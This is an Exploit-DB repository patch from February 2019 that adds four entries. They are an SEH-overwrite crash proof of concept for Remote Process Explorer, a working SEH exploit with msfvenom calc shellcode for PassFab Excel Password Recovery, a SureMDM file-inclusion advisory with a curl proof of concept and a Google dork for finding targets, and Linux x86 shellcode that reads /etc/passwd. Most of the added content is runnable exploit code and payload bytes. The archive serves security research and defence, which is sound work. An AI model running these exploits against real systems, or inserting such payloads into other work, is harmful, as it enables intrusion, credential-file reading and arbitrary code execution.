From 6050f45223fbab7c9ccf8b9ba1fbe42802ee4479 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 2 Feb 2019 05:01:47 +0000
Subject: [PATCH] DB: 2019-02-02

4 changes to exploits/shellcodes

Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)

PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit

SureMDM < 2018-11 Patch - Local / Remote File Inclusion

Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)
---
 exploits/windows/dos/46304.py      | 95 ++++++++++++++++++++++++++++++
 exploits/windows/local/46301.py    | 59 +++++++++++++++++++
 exploits/windows/webapps/46305.txt | 13 ++++
 files_exploits.csv                 |  3 +
 files_shellcodes.csv               |  1 +
 shellcodes/linux_x86/46302.c       | 78 ++++++++++++++++++++++++
 6 files changed, 249 insertions(+)
 create mode 100755 exploits/windows/dos/46304.py
 create mode 100755 exploits/windows/local/46301.py
 create mode 100644 exploits/windows/webapps/46305.txt
 create mode 100644 shellcodes/linux_x86/46302.c

diff --git a/exploits/windows/dos/46304.py b/exploits/windows/dos/46304.py
new file mode 100755
index 000000000..09252817c
--- /dev/null
+++ b/exploits/windows/dos/46304.py
@@ -0,0 +1,95 @@
+# Exploit Title: Remote Process Explorer v1.0.0.16 - Denial of Service (PoC) and SEH overwritten Crash PoC
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2019-01-30
+# Vendor Homepage: http://lizardsystems.com/action.php?action=home&product=rpexplorer&version=1.0.0.16
+# Software Link : http://lizardsystems.com/action.php?action=home&product=rpexplorer&version=1.0.0.16
+# Tested Version: 1.0.0.16
+# Tested on: Windows XP SP3
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run rpexplorer.exe
+# 2.- copy content rpexplorer_Crash.txt to clipboard (result from this python script)
+# 3.- Go to "Add computer" and paste the result in the first textbox and click in Add button.
+# 4.- Select "AAAAAAAAA...." computer, right mouse button and Connect and you will see a crash.
+
+'''
+
+Detect:
+
+SEH chain of thread 00000144
+Address    SE handler
+0114FEC8   78413977
+41387741   *** CORRUPT ENTRY ***
+
+EAX 0114FEBC
+ECX 0114FEC0 ASCII
+"w5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2B
+EDX 41347741
+EBX 0116236C
+ESP 0114FBF0
+EBP 0114FEC0 ASCII
+"w5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2B
+ESI 000000D4
+EDI 00000000
+EIP 00404F48 rpexplor.00404F48
+C 0  ES 0023 32bit 0(FFFFFFFF)
+P 1  CS 001B 32bit 0(FFFFFFFF)
+A 0  SS 0023 32bit 0(FFFFFFFF)
+Z 0  DS 0023 32bit 0(FFFFFFFF)
+S 0  FS 003B 32bit 7FFDC000(FFF)
+T 0  GS 0000 NULL
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
+ST0 empty
+ST1 empty
+ST2 empty
+ST3 empty
+ST4 empty
+ST5 empty
+ST6 empty
+ST7 empty
+               3 2 1 0      E S P U O Z D I
+FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
+FCW 1272  Prec NEAR,53  Mask    1 1 0 0 1 0
+
+Log data, item 24
+ Address=0BADF00D
+ Message=    SEH record (nseh field) at 0x0114fec8 overwritten with normal
+pattern : 0x41387741 (offset 684), followed by 308 bytes of cyclic data
+after the handler
+
+Check after script:
+
+SEH chain of thread 00000D04
+Address    SE handler
+0114FEC8   43434343
+42424242   *** CORRUPT ENTRY ***
+
+
+Log data, item 53
+ Address=7E6E5E50
+ Message=  0x7e6e5e50 : pop ebx # pop ebp # ret 0x04 | asciiprint,ascii
+{PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH:
+True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
+
+
+'''
+
+#!/usr/bin/env python
+
+'''
+calc = ("\x31\xC9"                # xor ecx,ecx
+        "\x51"                    # push ecx
+        "\x68\x63\x61\x6C\x63"    # push 0x636c6163
+        "\x54"                    # push dword ptr esp
+        "\xB8\xC7\x93\xC2\x77"    # mov eax,0x77c293c7
+        "\xFF\xD0")               # call eax
+'''
+
+crash = "\x41" * 684 + "BBBB" + "CCCC"
+#crash = "\x41" * 684 +  "\xEB\x14\x90\x90" + "\x50\x5e\x6e\x7e" + "\x90" * 24 + calc + "A"*(1000 - 32)
+f = open ("rpexplorer_Crash.txt", "w")
+f.write(crash)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46301.py b/exploits/windows/local/46301.py
new file mode 100755
index 000000000..8de61c35e
--- /dev/null
+++ b/exploits/windows/local/46301.py
@@ -0,0 +1,59 @@
+# Exploit Title: PassFab Excel Password Recovery SEH Local Exploit
+# Date: 31.01.19
+# Vendor Homepage:https://www.passfab.com/products/excel-password-recovery.html
+# Software Link:  https://www.passfab.com/downloads/passfab-excel-password-recovery.exe
+# Exploit Author: Achilles
+# Tested Version: 8.3.1
+# Tested on: Windows XP SP3
+
+
+# 1.- Run python code : PassFab_RAR
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open PassFab RAR Password Recovery
+# 4.- In the new Window click on the key in the upper right corner
+# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Registration Code'
+# 6.- Click 'Register'and the calculator will open
+# 7.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/env python
+import struct
+
+buffer = "\x41" * 260
+NSEH = "\xeb\x06\x90\x90" #jmp short 6
+SEH =  struct.pack('<L',0x100674dd) #pop pop ret SoftwareLog.dll
+nops = "\x90" * 20
+
+#badchar \x00\
+#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python
+buf =  ""
+buf += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
+buf += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
+buf += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
+buf += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
+buf += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
+buf += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
+buf += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
+buf += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
+buf += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
+buf += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
+buf += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
+buf += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
+buf += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
+buf += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
+buf += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
+buf += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
+buf += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
+buf += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
+buf += "\x8e\x2a\x79\xdb"
+
+payload = buffer + NSEH + SEH + nops + buf
+
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(payload)
+	f.write(payload)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/webapps/46305.txt b/exploits/windows/webapps/46305.txt
new file mode 100644
index 000000000..da05f8d29
--- /dev/null
+++ b/exploits/windows/webapps/46305.txt
@@ -0,0 +1,13 @@
+# Exploit Title: SureMDM LFI/RFI (Prior to 2018-11 Patch)
+# Google Dork: inurl:/api/DownloadUrlResponse.ashx
+# Date: 2019-02-01
+# Exploit Author: Digital Interruption
+# Vendor Homepage: https://www.42gears.com/
+# Software Link: https://www.42gears.com/products/suremdm-home/
+# Version: Versions prior to the November 2018 patch
+# Tested on: Windows
+# CVE : CVE-2018-15657
+
+An attacker can force the web server to request remote files and display the output by placing any arbitrary URL in the "url" parameter of /api/DownloadUrlResponse.ashx. This can also be utilised to request files from the local file system by using the file:// URI syntax, such as file://C:/WINDOWS/System32/drivers/etc/hosts
+
+Proof of concept: curl -H "ApiKey: apiKey" http://target/api/DownloadUrlResponse.ashx?url=file://C:/WINDOWS/System32/drivers/etc/hosts
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c468bf823..798afe1f7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6291,6 +6291,7 @@ id,file,description,date,author,type,platform,port
 46298,exploits/multiple/dos/46298.c,"macOS < 10.14.3 / iOS < 12.1.3 - Sandbox Escapes due to Type Confusions and Memory Safety Issues in iohideventsystem",2019-01-31,"Google Security Research",dos,multiple,
 46299,exploits/multiple/dos/46299.c,"macOS < 10.14.3 / iOS < 12.1.3 XNU - 'vm_map_copy' Optimization which Requires Atomicity isn't Atomic",2019-01-31,"Google Security Research",dos,multiple,
 46300,exploits/multiple/dos/46300.c,"macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics",2019-01-31,"Google Security Research",dos,multiple,
+46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)",2019-02-01,"Rafael Pedrero",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10271,6 +10272,7 @@ id,file,description,date,author,type,platform,port
 46283,exploits/windows/local/46283.py,"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH) (DEP Bypass)",2019-01-30,bzyo,local,windows,
 46288,exploits/windows/local/46288.py,"R 3.5.0 - Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
 46290,exploits/windows/local/46290.py,"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
+46301,exploits/windows/local/46301.py,"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit",2019-02-01,Achilles,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40770,3 +40772,4 @@ id,file,description,date,author,type,platform,port
 46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80
 46276,exploits/php/webapps/46276.txt,"PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)",2019-01-29,dd_,webapps,php,80
 46282,exploits/php/webapps/46282.txt,"Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection",2019-01-30,"Mehmet EMIROGLU",webapps,php,80
+46305,exploits/windows/webapps/46305.txt,"SureMDM < 2018-11 Patch - Local / Remote File Inclusion",2019-02-01,"Digital Interruption",webapps,windows,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 8b197b331..8c3cd1adb 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -938,3 +938,4 @@ id,file,description,date,author,type,platform
 46281,shellcodes/windows_x86/46281.c,"Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)",2019-01-30,"Kartik Durg",shellcode,windows_x86
 46264,shellcodes/arm/46264.s,"Linux/ARM -  Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)",2019-01-28,"Gokul Babu",shellcode,arm
 46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86
+46302,shellcodes/linux_x86/46302.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)",2019-02-01,Kiewicz,shellcode,linux_x86
diff --git a/shellcodes/linux_x86/46302.c b/shellcodes/linux_x86/46302.c
new file mode 100644
index 000000000..6a63872f7
--- /dev/null
+++ b/shellcodes/linux_x86/46302.c
@@ -0,0 +1,78 @@
+/* 
+# Shellcode Title: Linux/x86 - Read File (/etc/passwd) (58 bytes). NULL byte free
+# Date: 2019-01-31
+# Author: Kiewicz (@_Kiewicz)
+# Homepage: https://0xkiewicz.github.io
+# Tested on: Debian/x86
+# gcc -o shellcode -z execstack -fno-stack-protector shellcode.c 
+# PA-7854
+*/
+
+
+/******************************************************************
+$ objdump -d -M intel read_file
+
+read_file:     file format elf32-i386
+
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	eb 28                	jmp    804808a <read_file>
+
+08048062 <open>:
+ 8048062:	5b                   	pop    ebx
+ 8048063:	31 c9                	xor    ecx,ecx
+ 8048065:	f7 e1                	mul    ecx
+ 8048067:	99                   	cdq    
+ 8048068:	b0 05                	mov    al,0x5
+ 804806a:	cd 80                	int    0x80
+
+0804806c <read>:
+ 804806c:	89 c3                	mov    ebx,eax
+ 804806e:	b0 03                	mov    al,0x3
+ 8048070:	89 e7                	mov    edi,esp
+ 8048072:	89 f9                	mov    ecx,edi
+ 8048074:	31 d2                	xor    edx,edx
+ 8048076:	b2 ff                	mov    dl,0xff
+ 8048078:	cd 80                	int    0x80
+
+0804807a <write>:
+ 804807a:	89 c2                	mov    edx,eax
+ 804807c:	31 c0                	xor    eax,eax
+ 804807e:	b0 04                	mov    al,0x4
+ 8048080:	31 db                	xor    ebx,ebx
+ 8048082:	b3 01                	mov    bl,0x1
+ 8048084:	cd 80                	int    0x80
+
+08048086 <exit>:
+ 8048086:	b0 01                	mov    al,0x1
+ 8048088:	cd 80                	int    0x80
+
+0804808a <read_file>:
+ 804808a:	e8 d3 ff ff ff       	call   8048062 <open>
+
+0804808f <filetoread>:
+ 804808f:	2f                   	das    
+ 8048090:	65 74 63             	gs je  80480f6 <filetoread+0x67>
+ 8048093:	2f                   	das    
+ 8048094:	70 61                	jo     80480f7 <filetoread+0x68>
+ 8048096:	73 73                	jae    804810b <filetoread+0x7c>
+ 8048098:	77 64                	ja     80480fe <filetoread+0x6f>
+******************************************************************/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = "\xeb\x28\x5b\x31\xc9\xf7\xe1\x99\xb0\x05\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb2\xff\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+int main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+	return 0;
+}
\ No newline at end of file